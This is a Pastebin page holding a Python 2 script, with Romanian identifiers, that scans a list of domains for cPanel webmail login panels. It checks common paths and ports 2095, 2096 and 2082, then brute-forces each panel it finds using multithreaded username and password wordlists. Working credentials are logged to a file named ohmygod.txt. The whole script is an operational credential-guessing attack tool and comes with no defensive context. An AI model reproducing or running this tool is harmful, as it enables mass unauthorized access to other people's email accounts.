Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import urllib2
- import urllib
- import Queue
- import threading
- import signal
- from urlparse import urlparse
- import sys
- import json
- domenii=[]
- useri=[]
- passwd=[]
- stiva_login=Queue.Queue()
- stiva_brute=Queue.Queue()
- trap=False
- to_crack=[]
- dm=[]
- cracked=[]
- bad=[]
- done=[]
- domenii2=[]
- list_dom=[]
- ddm=[]
- def no404(url):
- r=urllib2.Request(url+"login/?login_only=1")
- try:
- u=urllib2.urlopen(r)
- if "status" in u.read():
- return 1
- except urllib2.HTTPError,e:
- if e.code==401 and "status" in e.read():
- return 1
- elif "status" in e.read():
- return 1
- else:
- return 0
- def login(domain,user,passwd):
- #print "apelat!\n"
- print " Incerc "+domain+" "+" "+user+" "+passwd
- data = urllib.urlencode({'user':user,'pass':passwd})
- #print domain+" "+data+"\n"
- req = urllib2.Request(domain+"login/?login_only=1", data)
- try:
- rsp = urllib2.urlopen(req)
- d=rsp.read()
- if "redirect" in d:
- return 1
- else:
- return -1
- except urllib2.HTTPError, e:
- if int(e.code)==401:
- return 0
- else:
- print str(e.code)+str(domain)
- return -1
- except urllib2.URLError,e:
- a=1
- def rq(url):
- global to_crack
- r=urllib2.Request(url)
- d=urlparse(url)
- print "[-] try:"+url
- try:
- http=urllib2.urlopen(r,timeout=10)
- if "Webmail" in http.read() and no404(url)==1 and d.hostname in http.geturl():
- to_crack.append(url)
- print "[+] "+url
- return 1
- else:
- return 0
- except urllib2.HTTPError,e:
- if e.code==401 or e.code==302 and d.hostname in e.geturl():
- if "Webmail" in e.read() and no404(url)==1:
- to_crack.append(url)
- print "[+] "+url
- return 1
- else:
- return 0
- except urllib2.URLError,e:
- return 0
- else:
- return 0
- def test_panel(j):
- global stiva_login,to_crack,dm,domenii2,dmd,list_dom
- while stiva_login.empty()==False and len(domenii)>0:
- ur=stiva_login.get()
- stiva_login.task_done()
- uht=urlparse(ur[1])
- if rq(ur[1]+"webmail")==1:
- rem2(ur[0])
- elif rq(ur[1]+"mail")==1:
- rem2(ur[0])
- elif rq(uht.scheme+"://webmail."+uht.hostname+"/"):
- rem2(ur[0])
- elif rq(uht.scheme+"://mail."+uht.hostname+"/"):
- rem2(ur[0])
- elif rq(uht.scheme+"://"+uht.hostname+":2096/")==1:
- rem2(ur[0])
- elif rq(uht.scheme+"://"+uht.hostname+":2082/")==1:
- rem2(ur[0])
- elif rq(uht.scheme+"://"+uht.hostname+":2095/")==1:
- rem2(ur[0])
- else:
- rem2(ur[0])
- def rem(d):
- global to_crack
- if d in to_crack:
- to_crack.remove(d)
- def rem2(d):
- global domenii
- if d in domenii:
- domenii.remove(d)
- def brute(j):
- global stiva_brute,cracked,bad,to_crack2
- while stiva_brute.empty()==False and len(to_crack)>0:
- date=stiva_brute.get()
- stiva_brute.task_done()
- o=urlparse(date[0]).hostname
- s=o.split(".")
- email_domain=s[len(s)-2]+"."+s[len(s)-1]
- if date[0] not in cracked:
- r=login(date[0],date[1]+"@"+email_domain,date[2])
- if r==1:
- print "[+] OH MY GOD!!!!!: "+date[0]+" "+date[1]+"@"+email_domain+" "+date[2]
- cracked.append(date[0])
- open("ohmygod.txt",'a').write(date[0]+" "+date[1]+"@"+email_domain+" "+date[2]+"\n")
- rem(date[0])
- def cauta_panel():
- global stiva_login,stiva_brute,domenii2,list_dom
- for d in domenii:
- url=urlparse(d)
- stiva_login.put((url.hostname,d))
- threaduri=[]
- for i in range(int(sys.argv[4])):
- t=threading.Thread(target=test_panel,args=(1,))
- threaduri.append(t)
- t.start()
- for t in threaduri:
- t.join()
- def start_brute():
- global stiva_brute,to_crack,useri,passwd
- for d in to_crack:
- for u in useri:
- for p in passwd:
- stiva_brute.put((d,u,p))
- threaduri=[]
- for i in range(int(sys.argv[5])):
- t=threading.Thread(target=brute,args=(1,))
- threaduri.append(t)
- t.start()
- for t in threaduri:
- t.join()
- domenii=open(sys.argv[1]).read().splitlines()
- useri=open(sys.argv[2]).read().splitlines()
- passwd=open(sys.argv[3]).read().splitlines()
- cauta_panel()
- for i in to_crack:
- print i
- start_brute()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement